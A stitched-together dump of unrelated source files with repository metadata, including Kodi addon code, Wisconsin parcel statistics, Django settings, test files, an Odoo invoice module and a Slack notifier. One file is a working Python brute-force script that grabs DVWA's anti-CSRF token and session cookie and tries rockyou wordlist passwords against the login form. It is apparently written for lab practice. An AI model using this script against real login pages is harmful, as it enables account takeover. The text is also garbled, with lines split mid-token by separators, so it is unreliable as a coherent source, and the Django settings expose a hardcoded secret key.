ep_class = DialogEpisodeInfo.get_window(self.window_type)
if not tvshow_id and tvshow:
tvshow_id = TheMovieDB.search_media(media_name=tvshow,
media_type="tv",
cache_days=7)
dialog = ep_class(INFO_DIALOG_FILE,
ADDON_PATH,
show_id=tvshow_id,
season=season,
episode=episode,
dbid=dbid)
self.open_dialog(dialog, prev_window)
def open_actor_info(self, prev_window=None, actor_id=None, name=None):
"""
open actor info, deal with window stack
"""
from dialogs import DialogActorInfo
if not actor_id:
name = name.decode("utf-8").split(" " + LANG(20347) + " ")
names = name[0].strip().split(" / ")
if len(names) > 1:
ret = xbmcgui.Dialog().select(heading=LANG(32027),
list=names)
if ret == -1:
return None
|
WIStCart/V3ValidationTool | V6ValidationTool_dist/script/LegacyCountyStats.py | Python | mit | 53,028 | 0.114053 | ADAMSLegacyDict = {'STATEID':38629,'PARCELID':38382,'TAXPARCELID':0,'PARCELDATE':38629,'TAXROLLYEAR':38629,'OWNERNME1':38198,'OWNERNME2':12641,'PSTLADRESS':38177,'SITEADRESS':22625,'ADDNUMPREFIX':28,'ADDNUM':22625,'ADDNUMSUFFIX':750,'PREFIX':6195,'STREETNAME':22625,'STREETTYPE':19749,'SUFFIX':1,'LANDMARKNAME':33,'UNITTYPE':410,'UNITID':410,'PLACENAME':38198,'ZIPCODE':65,'ZIP4':0,'STATE':4610,'SCHOOLDIST':38199,'SCHOOLDISTNO':38199,'CNTASSDVALUE':35923,'LNDVALUE':35923,'IMPVALUE':35923,'ESTFMKVALUE':27214,'NETPRPTA':35923,'GRSPRPTA':35923,'PROPCLASS':33964,'AUXCLASS':5252,'ASSDACRES':35923,'DEEDACRES':38198,'GISACRES':38629,'CONAME':38629,'LOADDATE':38629,'PARCELFIPS':38629,'PARCELSRC':38629,'LONGITUDE':38628,'LATITUDE':38628}
ASHLANDLegacyDict = {'STATEID':21168,'PARCELID':21168,'TAXPARCELID':0,'PARCELDATE':21158,'TAXROLLYEAR':21146,'OWNERNME1':21078,'OWNERNME2':3078,'PSTLADRESS':21073,'SITEADRESS':8663,'ADDNUMPREFIX':1,'ADDNUM':8663,'ADDNUMSUFFIX':3,'PREFIX':1330,'STREETNAME':8663,'STREETTYPE':7796,'SUFFIX':2209,'LANDMARKNAME':0,'UNITTYPE':6,'UNITID':6,'PLACENAME':21078,'ZIPCODE':1366,'ZIP4':0,'STATE':21168,'SCHOOLDIST':21078,'SCHOOLDISTNO':21078,'CNTASSDVALUE':18429,'LNDVALUE':18429,'IMPVALUE':18429,'ESTFMKVALUE':10881,'NETPRPTA':18429,'GRSPRPTA':18429,'PROPCLASS':15924,'AUXCLASS':5415,'ASSDACRES':18440,'DEEDACRES':0,'GISACRES':21168,'CONAME':21168,'LOADDATE':21168,'PARCELFIPS':21168,'PARCELSRC':21168,'LONGITUDE':21168,'LATITUDE':21168}
BA | RRONLegacyDict = {'STATEID':44181,'PARCELID':44181,'TAXPARCELID':0,'PARCELDATE':44181,'TAXROLLYEAR':44181,'OWNERNME1':41996,'OWNERNME2':4424,'PSTLADRESS':41996,'SITEADRESS':23451,'ADDNUMPREFIX':0,'ADDNUM':23451,'ADDNUMSUFFIX':526,'PREFIX':3546,'STREETNAME':23451,'STREETTYPE':23170,'SUFFIX':898,'LANDMARKNAME':0,'UNITTYPE':316,'UNITID':316,'PLACENAME':41996,'ZIPCODE':23451,'Z | IP4':0,'STATE':44181,'SCHOOLDIST':41996,'SCHOOLDISTNO':41996,'CNTASSDVALUE':37592,'LNDVALUE':37592,'IMPVALUE':37590,'ESTFMKVALUE':23332,'NETPRPTA':37592,'GRSPRPTA':0,'PROPCLASS':37592,'AUXCLASS':4704,'ASSDACRES':38644,'DEEDACRES':41996,'GISACRES':0,'CONAME':44181,'LOADDATE':44181,'PARCELFIPS':44181,'PARCELSRC':44181,'LONGITUDE':44181,'LATITUDE':44181}
BAYFIELDLegacyDict = {'STATEID':35386,'PARCELID':35386,'TAXPARCELID':34537,'PARCELDATE':34537,'TAXROLLYEAR':34537,'OWNERNME1':34537,'OWNERNME2':4263,'PSTLADRESS':33876,'SITEADRESS':13880,'ADDNUMPREFIX':0,'ADDNUM':13880,'ADDNUMSUFFIX':0,'PREFIX':4643,'STREETNAME':13880,'STREETTYPE':11622,'SUFFIX':174,'LANDMARKNAME':0,'UNITTYPE':520,'UNITID':519,'PLACENAME':34537,'ZIPCODE':13880,'ZIP4':0,'STATE':34537,'SCHOOLDIST':35386,'SCHOOLDISTNO':35386,'CNTASSDVALUE':29324,'LNDVALUE':29324,'IMPVALUE':29324,'ESTFMKVALUE':19931,'NETPRPTA':29324,'GRSPRPTA':29324,'PROPCLASS':26140,'AUXCLASS':8456,'ASSDACRES':29325,'DEEDACRES':34537,'GISACRES':34537,'CONAME':35386,'LOADDATE':35386,'PARCELFIPS':35386,'PARCELSRC':35386,'LONGITUDE':35386,'LATITUDE':35386}
BROWNLegacyDict = {'STATEID':102341,'PARCELID':102341,'TAXPARCELID':0,'PARCELDATE':6256,'TAXROLLYEAR':102341,'OWNERNME1':101942,'OWNERNME2':0,'PSTLADRESS':101926,'SITEADRESS':101941,'ADDNUMPREFIX':0,'ADDNUM':89520,'ADDNUMSUFFIX':0,'PREFIX':14747,'STREETNAME':101941,'STREETTYPE':98679,'SUFFIX':0,'LANDMARKNAME':0,'UNITTYPE':0,'UNITID':0,'PLACENAME':102339,'ZIPCODE':102322,'ZIP4':0,'STATE':102341,'SCHOOLDIST':101941,'SCHOOLDISTNO':101941,'CNTASSDVALUE':95769,'LNDVALUE':95769,'IMPVALUE':95769,'ESTFMKVALUE':86344,'NETPRPTA':95769,'GRSPRPTA':95769,'PROPCLASS':95682,'AUXCLASS':4574,'ASSDACRES':95769,'DEEDACRES':96686,'GISACRES':102341,'CONAME':102341,'LOADDATE':102341,'PARCELFIPS':102341,'PARCELSRC':102341,'LONGITUDE':102341,'LATITUDE':102341}
BUFFALOLegacyDict = {'STATEID':23498,'PARCELID':23498,'TAXPARCELID':0,'PARCELDATE':19407,'TAXROLLYEAR':23498,'OWNERNME1':23439,'OWNERNME2':7675,'PSTLADRESS':23309,'SITEADRESS':7364,'ADDNUMPREFIX':4576,'ADDNUM':7360,'ADDNUMSUFFIX':130,'PREFIX':4165,'STREETNAME':7364,'STREETTYPE':5138,'SUFFIX':2,'LANDMARKNAME':0,'UNITTYPE':0,'UNITID':0,'PLACENAME':23439,'ZIPCODE':7364,'ZIP4':0,'STATE':7364,'SCHOOLDIST':23439,'SCHOOLDISTNO':23439,'CNTASSDVALUE':22096,'LNDVALUE':22096,'IMPVALUE':22096,'ESTFMKVALUE':7371,'NETPRPTA':22096,'GRSPRPTA':22096,'PROPCLASS':20543,'AUXCLASS':5146,'ASSDACRES':22096,'DEEDACRES':0,'GISACRES':0,'CONAME':23498,'LOADDATE':23498,'PARCELFIPS':23498,'PARCELSRC':23498,'LONGITUDE':23498,'LATITUDE':23498}
BURNETTLegacyDict = {'STATEID':33242,'PARCELID':33242,'TAXPARCELID':32162,'PARCELDATE':32162,'TAXROLLYEAR':32185,'OWNERNME1':32162,'OWNERNME2':3971,'PSTLADRESS':32088,'SITEADRESS':15852,'ADDNUMPREFIX':0,'ADDNUM':15852,'ADDNUMSUFFIX':0,'PREFIX':3864,'STREETNAME':15852,'STREETTYPE':13117,'SUFFIX':1149,'LANDMARKNAME':0,'UNITTYPE':58,'UNITID':58,'PLACENAME':32162,'ZIPCODE':15852,'ZIP4':4,'STATE':32162,'SCHOOLDIST':32162,'SCHOOLDISTNO':32162,'CNTASSDVALUE':29582,'LNDVALUE':29582,'IMPVALUE':29582,'ESTFMKVALUE':21290,'NETPRPTA':29582,'GRSPRPTA':29582,'PROPCLASS':28063,'AUXCLASS':4129,'ASSDACRES':29582,'DEEDACRES':32162,'GISACRES':32162,'CONAME':33242,'LOADDATE':33242,'PARCELFIPS':33242,'PARCELSRC':33242,'LONGITUDE':33242,'LATITUDE':33242}
CALUMETLegacyDict = {'STATEID':23326,'PARCELID':23326,'TAXPARCELID':0,'PARCELDATE':2748,'TAXROLLYEAR':23240,'OWNERNME1':22675,'OWNERNME2':11746,'PSTLADRESS':22357,'SITEADRESS':20587,'ADDNUMPREFIX':10298,'ADDNUM':15708,'ADDNUMSUFFIX':0,'PREFIX':5061,'STREETNAME':20587,'STREETTYPE':17484,'SUFFIX':0,'LANDMARKNAME':0,'UNITTYPE':0,'UNITID':50,'PLACENAME':22675,'ZIPCODE':20612,'ZIP4':0,'STATE':22675,'SCHOOLDIST':22675,'SCHOOLDISTNO':22675,'CNTASSDVALUE':20892,'LNDVALUE':20892,'IMPVALUE':20892,'ESTFMKVALUE':14616,'NETPRPTA':20892,'GRSPRPTA':20892,'PROPCLASS':20790,'AUXCLASS':1471,'ASSDACRES':20892,'DEEDACRES':22675,'GISACRES':22867,'CONAME':23326,'LOADDATE':23326,'PARCELFIPS':23326,'PARCELSRC':23326,'LONGITUDE':23326,'LATITUDE':23326}
CHIPPEWALegacyDict = {'STATEID':51293,'PARCELID':51293,'TAXPARCELID':48608,'PARCELDATE':0,'TAXROLLYEAR':51293,'OWNERNME1':48608,'OWNERNME2':3483,'PSTLADRESS':45931,'SITEADRESS':26469,'ADDNUMPREFIX':4,'ADDNUM':26469,'ADDNUMSUFFIX':1,'PREFIX':7440,'STREETNAME':26469,'STREETTYPE':22454,'SUFFIX':218,'LANDMARKNAME':0,'UNITTYPE':108,'UNITID':108,'PLACENAME':48608,'ZIPCODE':26288,'ZIP4':27,'STATE':51293,'SCHOOLDIST':48608,'SCHOOLDISTNO':48608,'CNTASSDVALUE':44040,'LNDVALUE':44040,'IMPVALUE':44030,'ESTFMKVALUE':27813,'NETPRPTA':44044,'GRSPRPTA':0,'PROPCLASS':43528,'AUXCLASS':5451,'ASSDACRES':44921,'DEEDACRES':48608,'GISACRES':51293,'CONAME':51293,'LOADDATE':51293,'PARCELFIPS':51293,'PARCELSRC':51293,'LONGITUDE':51293,'LATITUDE':51293}
CLARKLegacyDict = {'STATEID':36506,'PARCELID':36505,'TAXPARCELID':0,'PARCELDATE':0,'TAXROLLYEAR':36506,'OWNERNME1':35114,'OWNERNME2':19198,'PSTLADRESS':34902,'SITEADRESS':16048,'ADDNUMPREFIX':10746,'ADDNUM':16011,'ADDNUMSUFFIX':0,'PREFIX':6663,'STREETNAME':16048,'STREETTYPE':13490,'SUFFIX':0,'LANDMARKNAME':0,'UNITTYPE':27,'UNITID':27,'PLACENAME':35114,'ZIPCODE':16039,'ZIP4':7,'STATE':35113,'SCHOOLDIST':35114,'SCHOOLDISTNO':35114,'CNTASSDVALUE':30654,'LNDVALUE':30649,'IMPVALUE':15284,'ESTFMKVALUE':12645,'NETPRPTA':30653,'GRSPRPTA':31893,'PROPCLASS':30703,'AUXCLASS':5147,'ASSDACRES':30481,'DEEDACRES':34359,'GISACRES':36506,'CONAME':36506,'LOADDATE':36506,'PARCELFIPS':36506,'PARCELSRC':36506,'LONGITUDE':36506,'LATITUDE':36506}
COLUMBIALegacyDict = {'STATEID':43016,'PARCELID':43016,'TAXPARCELID':42896,'PARCELDATE':21413,'TAXROLLYEAR':42896,'OWNERNME1':42896,'OWNERNME2':18955,'PSTLADRESS':42764,'SITEADRESS':24118,'ADDNUMPREFIX':12162,'ADDNUM':24117,'ADDNUMSUFFIX':8,'PREFIX':8113,'STREETNAME':24118,'STREETTYPE':20440,'SUFFIX':36,'LANDMARKNAME':0,'UNITTYPE':0,'UNITID':268,'PLACENAME':42896,'ZIPCODE':11348,'ZIP4':0,'STATE':42896,'SCHOOLDIST':42896,'SCHOOLDISTNO':42896,'CNTASSDVALUE':38991,'LNDVALUE':38991,'IMPVALUE':38991,'ESTFMKVALUE':24496,'NETPRPTA':38991,'GRSPRPTA':38991,'PROPCLASS':38702,'AUXCLASS':4276,'ASSDACRES':38991,'DEEDACRES':42896,'GISACRES':43016,'CONAME':43016,'LOADDATE':43016,'PARCELFIPS':43016,'PARCELSRC':43016,'LONGITUDE':43016,'LATITUDE':43016}
CRAWFORDLegacyDict = {'STATEID':20787,'PARCELID':20349,'TAXPARCELID':20079 |
cybert79/HaXor | boot2root-scripts/dvwa-login-bruteforce-http-post-csrf.py | Python | unlicense | 3,803 | 0.004207 | #!/usr/bin/python
# Quick PoC template for HTTP POST form brute force, with anti-CRSF token
# Target: DVWA v1.10
# Date: 2015-10-19
# Author: g0tmi1k ~ https://blog.g0tmi1k.com/
# Source: https://blog.g0tmi1k.com/2015/10/dvwa-login/
import requests
import sys
import re
from BeautifulSoup import BeautifulSoup
# Variables
target = 'http://192.168.1.33/DVWA'
user_list = '/usr/share/seclists/Usernames/top_shortlist.txt'
pass_list = '/usr/share/seclists/Passwords/rockyou.txt'
# Value to look for in response header (Whitelisting)
success = 'index.php'
# Get the anti-CSRF token
def csrf_token():
try:
# Make the request to the URL
print "\n[i] URL: %s/login.php" % target
r = requests.get("{0}/login.php".format(target), allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n[!] csrf_token: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target)
sys.exit(-1)
# Extract anti-CSRF token
soup = BeautifulSoup(r.text)
user_token = soup("input", {"name": "user_token"})[0]["value"]
print "[i] user_token: %s" % user_token
# Extract session information
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)
print "[i] session_id: %s\n" % session_id
return session_id, user_token
# Make the request to-do the brute force
def url_request(username, password, session_id, user_token):
# POST data
data = {
"username": username,
"password": password,
"user_token": user_token,
"Login": "Login"
}
# Cookie data
cookie = {
"PHPSESSID": session_id
}
try:
# Make the request to the URL
#print "\n[i] URL: %s/vulnerabilities/brute/" | % target
#print "[i] Data: %s" % data
#print "[i] Cookie: %s" % cookie
r = requests.post("{0}/login.php".format(ta | rget), data=data, cookies=cookie, allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target)
sys.exit(-1)
# Wasn't it a redirect?
if r.status_code != 301 and r.status_code != 302:
# Feedback for the user (there was an error again) & Stop execution of our request
print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
sys.exit(-1)
# We have what we need
return r.headers["Location"]
# Main brute force loop
def brute_force(user_token, session_id):
# Load in wordlists files
with open(pass_list) as password:
password = password.readlines()
with open(user_list) as username:
username = username.readlines()
# Counter
i = 0
# Loop around
for PASS in password:
for USER in username:
USER = USER.rstrip('\n')
PASS = PASS.rstrip('\n')
# Increase counter
i += 1
# Feedback for the user
print ("[i] Try %s: %s // %s" % (i, USER, PASS))
# Fresh CSRF token each time?
#user_token, session_id = csrf_token()
# Make request
attempt = url_request(USER, PASS, session_id, user_token)
#print attempt
# Check response
if attempt == success:
print ("\n\n[i] Found!")
print "[i] Username: %s" % (USER)
print "[i] Password: %s" % (PASS)
return True
return False
# Get initial CSRF token
session_id, user_token = csrf_token()
# Start brute forcing
brute_force(user_token, session_id)
|
Jonothompson/my-django-blog | mysite/settings.py | Python | mit | 2,696 | 0.000371 | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')*_jac8bag@zj^xx)oc5yvhl2u9y6^95&*tjmny@jfzy2+hjmk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthentica | tionMiddleware',
| 'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static') |
sbailey/redrock | py/redrock/test/test_io.py | Python | bsd-3-clause | 3,397 | 0.003827 | from __future__ import division, print_function
import os
import unittest
from uuid import uuid1
import numpy as np
from .. import utils as rrutils
from ..results import read_zscan, write_zscan
from ..templates import DistTemplate, find_templates, load_dist_templates
from ..zfind import zfind
from . import util
class TestIO(unittest.TestCase):
#- Create unique test filename in a subdirectory
@classmethod
def setUpClass(cls):
cls.testfile = 'test-{uuid}.h5'.format(uuid=uuid1())
#- Cleanup test files if they exist
@classmethod
def tearDownClass(cls):
if os.path.exists(cls.testfile):
os.remove(cls.testfile)
def setUp(self):
#- remove testfile if leftover from a previous test
if os.path.exists(self.testfile):
os.remove(self.testfile)
def test_endian(self):
x1 = np.arange(5, dtype='>f')
x2 = np.arange(5, dtype='<f')
self.assertTrue(rrutils.native_endian(x1).dtype.isnative)
self.assertTrue(rrutils.native_endian(x2).dtype.isnative)
if x1.dtype.isnative:
self.assertTrue(x1 is rrutils.native_endian(x1))
else:
self.assertTrue(x2 is rrutils.native_endian(x2))
### @unittest.skipIf('RR_TEMPLATE_DIR' not in os.environ, '$RR_TEMPLATE_DIR not set')
def test_find_templates(self):
templates = find_templates()
self.assertTrue(len(templates) > 0)
template_dir = os.path.dirname(templates[0])
templates = find_templates(template_dir = template_dir)
self.assertTrue(len(templates) > 0)
### @unittest.skipIf('RR_TEMPLATE_DIR' not in os.environ, '$RR_TEMPLATE_DIR not set')
def test_read_templates(self):
dtarg = util.fake_targets()
dwave = dtarg.wavegrids()
for dtp in load_dist_templates(dwave):
self.assertIn('wave', dtp.template.__dict__)
self.assertIn('flux', dtp.template.__dict__)
wave = dtp.template.wave
flux = dtp.template.flux
self.assertEqual(wave.shape[0], flux.shape[1])
self.assertEqual(wave.ndim, 1)
self.assertEqual(flux.ndim, 2)
def test_zscan_io(self):
| dtarg = util.fake_targets()
# Get the dictionary of wavelength grids
dwave = dtarg.wavegrids()
# Construct the distributed template.
template = util.get_template(subtype='BLAT')
dtemp = DistTemplate(template, dwave)
zscan1, zfit1 = zfind(dtarg, [ dtemp ])
write_zscan(self.testfile, zscan1, zfit1)
write_zscan(self.testfile, zscan1, zfit1, clobber=True)
zscan2, zfit2 = read_zscan(self.testfile)
self.assertEqual(zfit1.c | olnames, zfit2.colnames)
for cn in zfit1.colnames:
np.testing.assert_equal(zfit1[cn], zfit2[cn])
for targetid in zscan1:
for spectype in zscan1[targetid]:
for key in zscan1[targetid][spectype]:
d1 = zscan1[targetid][spectype][key]
d2 = zscan2[targetid][spectype][key]
self.assertTrue(np.all(d1==d2), 'data mismatch {}/{}/{}'.format(targetid, spectype, key))
def test_suite():
"""Allows testing of only this module with the command::
python setup.py test -m <modulename>
"""
return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
kevin8909/xjerp | openerp/addons/Rainsoft_Xiangjie/rainsoft_account_invoice.py | Python | agpl-3.0 | 2,540 | 0.062205 | # -*- coding: utf-8 -*-
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
class rainsoft_account_invoice(osv.osv):
_name='account.invoice'
_inherit = 'account.invoice'
_columns={
'p_comment':fields.related('partner_id','comment',type='text',relation='res.partner',string='p_comment'),
}
rainsoft_account_invoice()
class rainsoft_account_invoice_line(osv.osv):
_name="account.invoice.line"
_inherit="ac | count.invoice.line"
def _get_average_price(self,cr,uid,ids,fields,args,context=None):
res={}
if not context.has_key('period'):
for i_id in ids:
res[i_id]={
'average_price':0.0,
'cost_amount':0. | 0,
}
return res
period = context['period']
for i_id in ids:
invoice = self.browse(cr,uid,i_id)
#check if the product is phantom type
boms_id = self.pool.get('mrp.bom').search(cr,uid,[('product_id','=',invoice.product_id.id),('type','=','phantom')],context=context)
if len(boms_id):
boms = self.pool.get('mrp.bom').browse(cr,uid,boms_id[0],context=context)
a_price = 0.0
for bom in boms.bom_lines:
bom_lines = self.pool.get('rainsoft.account.carryover.line').search(cr,uid,[('product_id','=',bom.product_id.id),('period_id','=',period)],context=context)
line = self.pool.get('rainsoft.account.carryover.line').browse(cr,uid,bom_lines[0],context=context)
a_price +=line.average_price * bom.product_qty
res[i_id]={'average_price':a_price,'cost_amount':a_price*invoice.quantity,}
else:
line_ids = self.pool.get('rainsoft.account.carryover.line').search(cr,uid,[('product_id','=',invoice.product_id.id),('period_id','=',period)],context=context)
if len(line_ids):
line = self.pool.get('rainsoft.account.carryover.line').browse(cr,uid,line_ids[0],context=context)
res[i_id]={'average_price':line.average_price,'cost_amount':line.average_price*invoice.quantity,}
return res
_columns={
'date':fields.related('invoice_id','date_invoice',type='date',string='Date'),
'state':fields.related('invoice_id','state',type='char',string='State'),
'average_price':fields.function(_get_average_price,multi="sums",string='Average Price',digits_compute=dp.get_precision('Account')),
'cost_amount':fields.function(_get_average_price,multi="sums",string="Cost Amount",digits_compute=dp.get_precision('Account')),
}
rainsoft_account_invoice_line()
|
LordGaav/notification-scripts | slack.py | Python | mit | 3,578 | 0 | #!/usr/bin/env python3
#
# Copyright (c) 2017 Nick Douma
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLI | ED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER |
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from argparse import ArgumentParser, ArgumentTypeError
import datetime
import json
import re
import urllib.error
import urllib.parse
import urllib.request
import sys
ISO8601 = r"^(\d{4})-?(\d{2})-?(\d{2})?[T ]?(\d{2}):?(\d{2}):?(\d{2})"
def iso8601_to_unix_timestamp(value):
try:
return int(value)
except ValueError:
pass
matches = re.match(ISO8601, value)
if not matches:
raise ArgumentTypeError("Argument is not a valid UNIX or ISO8601 "
"timestamp.")
return int(datetime.datetime(
*[int(m) for m in matches.groups()])).timestamp()
def hex_value(value):
value = value.replace("#", "")
if not re.match(r"^[a-f0-9]{6}$", value):
raise ArgumentTypeError("Argument is not a valid hex value.")
return value
parser = ArgumentParser(description="Send notifications using Slack")
parser.add_argument("--webhook-url", help="Webhook URL.", required=True)
parser.add_argument("--channel", help="Channel to post to (prefixed with #), "
"or a specific user (prefixed with @).")
parser.add_argument("--username", help="Username to post as")
parser.add_argument("--title", help="Notification title.")
parser.add_argument("--title_link", help="Notification title link.")
parser.add_argument("--color", help="Sidebar color (as a hex value).",
type=hex_value)
parser.add_argument("--ts", help="Unix timestamp or ISO8601 timestamp "
"(will be converted to Unix timestamp).",
type=iso8601_to_unix_timestamp)
parser.add_argument("message", help="Notification message.")
args = parser.parse_args()
message = {}
for param in ["channel", "username"]:
value = getattr(args, param)
if value:
message[param] = value
attachment = {}
for param in ["title", "title_link", "color", "ts", "message"]:
value = getattr(args, param)
if value:
attachment[param] = value
attachment['fallback'] = attachment['message']
attachment['text'] = attachment['message']
del attachment['message']
message['attachments'] = [attachment]
payload = {"payload": json.dumps(message)}
try:
parameters = urllib.parse.urlencode(payload).encode('UTF-8')
url = urllib.request.Request(args.webhook_url, parameters)
responseData = urllib.request.urlopen(url).read()
except urllib.error.HTTPError as he:
print("Sending message to Slack failed: {}".format(he))
sys.exit(1)
|
jmcnamara/XlsxWriter | xlsxwriter/test/comparison/test_hyperlink31.py | Python | bsd-2-clause | 929 | 0 | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename(' | hyperlink31.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with hyperlinks."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
format1 = workbook.add_format({'bold': True})
worksheet.write('A1', 'Test', format1)
| worksheet.write('A3', 'http://www.python.org/')
workbook.close()
self.assertExcelEqual()
|
stopstalk/stopstalk-deployment | private/scripts/populate-atcoder-problems.py | Python | mit | 1,810 | 0.003867 | """
Copyright (c) 2015-2020 Raj Patel(raj454raj@gmail.com), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and assoc | iated documentation files (the "Software"), to deal
in | the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import requests
from sites.init import *
aptable = db.atcoder_problems
row_count = db(aptable).count()
import requests
response = get_request("https://kenkoooo.com/atcoder/resources/problems.json")
problems = response.json()
if len(problems) > row_count:
print str(datetime.datetime.now()), "Row counts is different db:", row_count, " api:", len(problems)
aptable.truncate()
for row in problems:
aptable.insert(contest_id=row["contest_id"],
problem_identifier=row["id"],
name=row["title"])
else:
print str(datetime.datetime.now()), "Row count is same as in db", row_count
|
mgood/flask-failsafe | setup.py | Python | bsd-2-clause | 1,085 | 0.000922 | import os
from setuptools import setup
here = os.path.abspath(os.path.dirname(__file__))
try:
README = open(os.path.join(here, 'README.rst')).read()
CHANGES = open(os.path.join(here, 'CHANGES.rst') | ).read()
except:
README = ''
CHANGES = ''
setup(
name='Flask-Failsafe',
version='0.2',
url='http://github.com/mgood/flask-failsafe',
license='BSD',
author='Matt Good',
author_email='matt@matt-good.net',
description='A failsafe for the Flask reloader',
long_description=README + '\n\n' + CHANGES,
zip_safe=True,
platforms='any',
py_modules=['flask_failsafe'],
install_requires=[
'Flask>=0.8',
],
classifiers=[
'Envir | onment :: Web Environment',
'Framework :: Flask',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
vmanoria/bluemix-hue-filebrowser | hue-3.8.1-bluemix/apps/sqoop/src/sqoop/settings.py | Python | gpl-2.0 | 916 | 0 | # Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use thi | s file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licens | es/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
DJANGO_APPS = ['sqoop']
NICE_NAME = 'Sqoop'
MENU_INDEX = 20
ICON = 'sqoop/art/icon_sqoop_48.png'
REQUIRES_HADOOP = False
IS_URL_NAMESPACED = True
|
maddiestone/IDAPythonEmbeddedToolkit | make_strings.py | Python | mit | 3,874 | 0.019102 | ##############################################################################################
